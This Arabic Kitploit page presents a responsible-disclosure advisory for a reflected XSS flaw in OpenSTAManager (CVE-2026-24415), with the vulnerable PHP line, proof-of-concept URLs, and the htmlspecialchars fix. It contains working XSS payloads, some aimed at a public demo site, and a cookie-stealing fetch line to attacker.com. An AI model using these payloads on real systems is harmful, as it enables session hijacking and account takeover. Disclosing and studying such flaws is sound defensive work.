Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager متأثر بثغرة XSS في modifica_iva.php عبر معامل righe | Kitploit
أدوات/GitHubGitHub/lukasz-rybak/cve-2026-24415
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager متأثر بثغرة XSS في modifica_iva.php عبر معامل righe

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24415: OpenSTAManager متأثر بثغرة XSS في modifica_iva.php عبر معامل righe

نظرة عامة

الحقلالتفاصيل
معرف CVECVE-2026-24415
الخطورةمتوسطة
النشرة الأمنيةعرض النشرة الأمنية
اكتشفهاLukasz Rybak

المنتجات المتأثرة

  • devcode-it/openstamanager (الإصدارات: < 2.9.8)

تصنيف CWE

  • CWE-79: المعالجة غير السليمة للمدخلات أثناء توليد صفحة الويب ('البرمجة النصية عبر المواقع')

التفاصيل

الملخص

تسمح ثغرات متعددة من نوع البرمجة النصية عبر المواقع المنعكسة (Reflected XSS) في OpenSTAManager v2.9.8 للمهاجمين غير المصادَق عليهم بتنفيذ كود JavaScript عشوائي في سياق متصفحات المستخدمين الآخرين من خلال معاملات URL مصممة بعناية، مما قد يؤدي إلى اختطاف الجلسات وسرقة بيانات الاعتماد وإجراءات غير مصرح بها.

المعامل القابل للاستغلال: righe (GET)

التفاصيل

يحتوي OpenSTAManager v2.9.8 على ثغرات متعددة من نوع XSS المنعكسة في النوافذ المنبثقة لتعديل الفواتير/الطلبات/العقود. يفشل التطبيق في تعقيم المدخلات المقدمة من المستخدم عبر معامل GET righe بشكل صحيح قبل عكسها في مخرجات HTML.

موقع الكود القابل للاستغلال: الملف: /modules/contratti/modals/modifica_iva.php (السطر 125)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

يتم إخراج معامل $_GET['righe'] مباشرة في سمة value الخاصة بـ HTML دون أي تعقيم باستخدام htmlspecialchars() أو دوال مكافئة. وهذا يسمح للمهاجم بالخروج من سياق السمة وحقن HTML/JavaScript عشوائي.

جميع الملفات المتأثرة:

  1. /modules/contratti/modals/modifica_iva.php - السطر 125، السطر 167
  2. /modules/preventivi/modals/modifica_iva.php - السطر 125، السطر 167
  3. /modules/fatture/modals/modifica_iva.php - السطر 121، السطر 161
  4. /modules/ddt/modals/modifica_iva.php - السطر 125، السطر 167
  5. /modules/ordini/modals/modifica_iva.php - السطر 125، السطر 167
  6. /modules/interventi/modals/modifica_iva.php - السطر 125، السطر 167

إثبات المفهوم (PoC)

المتطلبات الأساسية:

  • مثيل تشغيلي من OpenSTAManager v2.9.8
  • بيانات اعتماد إدارية صالحة (اسم المستخدم: admin، كلمة المرور: admin لمثيل الاختبار)

الخطوة 1: تسجيل الدخول

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

الخطوة 2: تشغيل XSS انتقل إلى عنوان URL التالي في المتصفح (أو استخدم curl مع ملفات تعريف الارتباط):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

عناوين URL المختبرة (جميعها قابلة للاستغلال):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

النتيجة المتوقعة: تظهر نافذة تنبيه JavaScript تعرض ملف تعريف ارتباط الجلسة الحالي، مما يؤكد تنفيذ الكود.

مخرجات HTML (تم التحقق منها على مثيل مباشر):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

التحقق:

صورة صورة

حمولات بديلة: سرقة الجلسة: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

الأثر

المستخدمون المتأثرون: جميع المستخدمين المصادَق عليهم الذين لديهم حق الوصول إلى وحدات العقود أو الفواتير أو عروض الأسعار أو الطلبات.

سيناريو الهجوم:

  1. يقوم المهاجم بإنشاء عنوان URL خبيث بحمولة XSS
  2. يرسل المهاجم عنوان URL إلى الضحية عبر البريد الإلكتروني/الدردشة/التصيد الاحتيالي
  3. ينقر الضحية (مستخدم مصادَق عليه) على الرابط
  4. يتم تنفيذ JavaScript الخبيث في سياق متصفح الضحية
  5. يمكن للمهاجم:
    • سرقة ملفات تعريف ارتباط الجلسة → الاستيلاء الكامل على الحساب
    • تنفيذ إجراءات نيابة عن الضحية (إنشاء/تعديل/حذف السجلات)
    • سرقة رموز CSRF وتجاوز حماية CSRF
    • إعادة التوجيه إلى صفحة تصيد احتيالي
    • حقن مسجل لوحة مفاتيح لالتقاط البيانات الحساسة
    • تعديل محتوى الصفحة لخداع المستخدم للكشف عن بيانات الاعتماد

الإصلاح الموصى به:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

قم بتطبيق هذا الإصلاح على جميع الملفات المتأثرة المذكورة في قسم التفاصيل.

المراجع

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

إخلاء المسؤولية

تم الإبلاغ عن ثغرة CVE هذه بشكل مسؤول وفقًا لممارسات الإفصاح المنسق عن الثغرات الأمنية. المعلومات المقدمة هنا لأغراض تعليمية ودفاعية فقط.

تنزيل الأداة